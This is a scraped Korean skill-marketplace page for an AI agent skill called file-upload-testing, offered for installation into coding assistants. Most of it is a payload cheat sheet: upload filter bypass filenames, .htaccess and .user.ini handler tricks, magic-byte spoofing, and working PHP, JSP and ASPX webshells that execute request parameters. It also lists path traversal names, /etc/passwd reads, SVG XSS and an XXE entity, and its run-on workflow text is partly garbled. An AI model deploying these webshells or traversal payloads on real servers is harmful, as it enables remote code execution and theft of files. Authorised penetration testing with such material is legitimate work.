원클릭으로
file-upload-testing
File upload vulnerability testing — webshells, bypass, path traversal
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
File upload vulnerability testing — webshells, bypass, path traversal
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | file-upload-testing |
| description | File upload vulnerability testing — webshells, bypass, path traversal |
| origin | RedteamOpencode |
run_tool curl (multipart upload)submit → persist → retrieve/render/admin-review/file-upload or any multipart endpoint accepts a
payload, run one bounded Upload Type confirmation before closing the upload case: submit a
non-PDF/non-ZIP payload such as a tiny .txt, .xml, or .svg with the same authenticated
context, preserve the status/body evidence, then visit the consumer or scoreboard route that
confirms whether Upload Type flipped. If the upload accepts but the consumer route is still
unknown, return REQUEUE with the exact uploaded filename and the next concrete consumer path
to inspect instead of DONE STAGE=exhausted.DONE STAGE=vuln_confirmed or REQUEUE with a concrete next step (exact workflow/artifact to confirm) instead of marking the case clean/exploited or leaving the batch without outcomes.shell.php.jpg, shell.php.pngshell.php%00.jpg, shell.php\x00.jpgshell.PhP, shell.pHP, shell.Php.php3, .php5, .phtml, .phar.jspx, .jsw, .jsv.aspx, .ascx, .ashx, .asa, .cershell.php., shell.php..., shell.php , shell.php::$DATA.htaccess to add custom handler: AddType application/x-httpd-php .xyz.user.ini with auto_prepend_file=shell.jpgContent-Type to image/jpeg or image/png while sending PHPGIF89a;<?php system($_GET['c']); ?>FF D8 FF E0 before payloadexiftool -Comment='<?php system("id"); ?>' image.jpg<?php system($_GET['c']); ?><?=cat /etc/passwd?><% Runtime.getRuntime().exec(request.getParameter("c")); %><%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd","/c " + Request["c"]); %><?=phpinfo();?> to confirm execution../../../var/www/html/shell.php..%2f..%2f..%2fshell.php....//....//shell.php../../config.php<svg onload="alert(1)"> or <script> in SVG<!ENTITY xxe SYSTEM "file:///etc/passwd">../../ path entries